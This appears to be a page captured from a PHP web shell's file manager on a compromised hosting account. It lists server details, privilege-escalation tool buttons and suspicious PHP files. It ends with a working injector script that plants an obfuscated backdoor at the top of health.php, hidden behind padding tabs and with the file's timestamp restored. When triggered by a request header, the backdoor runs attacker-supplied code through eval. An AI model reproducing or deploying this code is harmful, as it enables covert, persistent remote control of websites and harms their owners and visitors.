Linux premium309.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
Server IP : 199.188.201.183 & Your IP : 216.73.216.116
Domains :
Cant Read [ /etc/named.conf ]
User : brntxyqh
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
brntxyqh /
wbo777vamos1.click /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2026-01-27 06:35
css
[ DIR ]
drwxr-xr-x
2026-02-10 03:32
images
[ DIR ]
drwxr-xr-x
2026-02-10 03:32
.desc
2
KB
-rw-r--r--
2025-12-03 16:49
.descriptor
1.23
KB
-rw-r--r--
2025-12-16 01:49
.htaccess
197
B
-r--r--r--
2026-02-04 02:19
32next.php
1.01
KB
-rw-r--r--
2026-01-31 12:15
Or.php
0
B
-rw-r--r--
2025-12-03 17:04
U.php
0
B
-rw-r--r--
2026-01-04 15:00
adr_vault.php
0
B
-rw-r--r--
2025-12-03 13:07
aerobsyh.php
14.76
KB
-rw-r--r--
2026-01-14 09:41
apt_sources.php
0
B
-rw-r--r--
2025-12-24 10:59
author.php
0
B
-rw-r--r--
2025-12-09 13:16
bad.php
623
B
-rw-r--r--
2026-01-31 12:23
cancel.php
0
B
-rw-r--r--
2025-12-13 06:36
class.php
1.19
KB
-rw-r--r--
2026-02-07 15:12
cmd.php
1.7
KB
-rw-r--r--
2026-01-31 12:24
de_DE.php
0
B
-rw-r--r--
2026-01-04 15:00
default_category.php
0
B
-rw-r--r--
2026-01-04 15:00
error_log
27.61
KB
-rw-r--r--
2026-01-08 09:05
extract.php
113
B
-rw-r--r--
2026-01-06 23:06
functions.locale.php
0
B
-rw-r--r--
2025-12-09 11:20
gradereport_user.php
0
B
-rw-r--r--
2025-12-06 06:59
header_http.inc.php
0
B
-rw-r--r--
2025-12-03 13:07
imagelist.php
0
B
-rw-r--r--
2025-12-13 06:32
index.html
6.42
KB
-rw-r--r--
2025-07-23 01:22
lib_editor.php
0
B
-rw-r--r--
2025-12-09 12:41
mcp_album.php
0
B
-rw-r--r--
2026-01-04 15:01
ms-edit.php
140
B
-rw-r--r--
2026-01-25 22:21
php.ini
40
B
-rw-r--r--
2026-01-27 20:23
pressrelease.php
0
B
-rw-r--r--
2025-12-24 10:58
r.php
0
B
-rw-r--r--
2025-12-27 08:43
robots.txt
84
B
-rw-r--r--
2026-01-27 06:34
security.log.php
0
B
-rw-r--r--
2025-12-04 05:30
swedish_mimes.php
0
B
-rw-r--r--
2026-01-04 14:59
usergroup_5.php
0
B
-rw-r--r--
2025-11-25 11:27
xoopscache.php
0
B
-rw-r--r--
2025-12-24 10:59
yfkvvjcb.php
14.76
KB
-rw-r--r--
2026-01-14 10:11
Save
Rename
<?php $path = '/home/brntxyqh/wbo777vamos1.click/health.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24_HEADERS%20%3D%20getallheaders%28%29%3Bif%28isset%28%24_HEADERS%5B%27Feature-Policy%27%5D%29%29%7B%24c%3D%22%3C%5Cx3fp%5Cx68p%5Cx20%40%5Cx65v%5Cx61l%5Cx28%24%5Cx5fR%5Cx45Q%5Cx55E%5Cx53T%5Cx5b%5C%22%5Cx53e%5Cx72v%5Cx65r%5Cx2dT%5Cx69m%5Cx69n%5Cx67%5C%22%5Cx5d%29%5Cx3b%40%5Cx65v%5Cx61l%5Cx28%24%5Cx5fH%5Cx45A%5Cx44E%5Cx52S%5Cx5b%5C%22%5Cx53e%5Cx72v%5Cx65r%5Cx2dT%5Cx69m%5Cx69n%5Cx67%5C%22%5Cx5d%29%5Cx3b%22%3B%24f%3D%27/tmp/.%27.time%28%29%3B%40file_put_contents%28%24f%2C%20%24c%29%3B%40include%28%24f%29%3B%40unlink%28%24f%29%3B%7D'); if (strstr($content, $new_code)) { die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) { if (substr($content, 0, strlen($start)) == $start) { $content = substr($content, strlen($start)); $content = $start.str_repeat("\t", 42).$new_code."\n".$content; if (file_put_contents($path, $content)) { @touch($path, $ft); $content = file_get_contents($path); if (strstr($content, $new_code)) { die('!success!'); } } } } die('!failed!');